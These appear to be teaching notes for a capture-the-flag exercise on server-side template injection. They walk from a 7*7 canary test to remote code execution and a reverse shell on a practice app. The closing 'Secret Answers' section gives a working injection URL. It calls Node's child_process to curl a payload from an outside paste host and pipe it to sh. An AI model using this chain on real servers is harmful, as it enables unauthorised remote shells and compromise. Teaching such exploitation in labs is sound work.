Server-Side Template Injection

Server-Side Templating (History)

There has been a pendulum between client-side rendering and server-side rendering that is swinging back towards server-side rendering.

This is always determined by profits, in the 90s server side rendering made cool experiences... THAT COST A TON to the company to provide.

So we moved it to client-side with AJAX which allowed the internet companies to work.

Now computing is SO CHEAP that the extra milliseconds we save by not having your mobile device do too much computing reduces bounce rates... so back to the 90s we go.

Template Injection

So if there is dynamic data loaded and created inside of a server, we can attempt to inject malicious code into it.

The canary in a coal-mine is just 7*7. If I can see 49 and not 7*7 then I'm getting code to evaluate. HUGE WIN.

Back to Jail

Once you can get some remote code execution (RCE) then you start figuring out what gadgets you have available to you.

For this there are many cool tricks, payload, etc to learn.

• Hacktricks.xyz
• PayloadsAllTheThings: SSTI

Part 1: Get the Flag. https://general-immediate-fish.glitch.me/stuffhere and Source code here

Reverse Shells

Now, here's the real "win", if you have some super-constrained RCE can you turn around and get a complete shell on that server.

That is called a REVERSE SHELL.

Useful stuff:

• https://www.revshells.com/
• https://www.urlencoder.org/
• Digital Ocean

Part 2: Get a Reverse Shell https://general-immediate-fish.glitch.me/stuffhere and Source code here

Secret Answers:

• Use a sort of pastebin code hoster like http://t.is.am/
• Paste in one of the Python3 payloads from revshells
• Get the ID backout and swap it into:
• https://general-immediate-fish.glitch.me/=process.mainModule.require('child_process').exec('curl%20is.am%2FIDHERE%20%7C%20sh')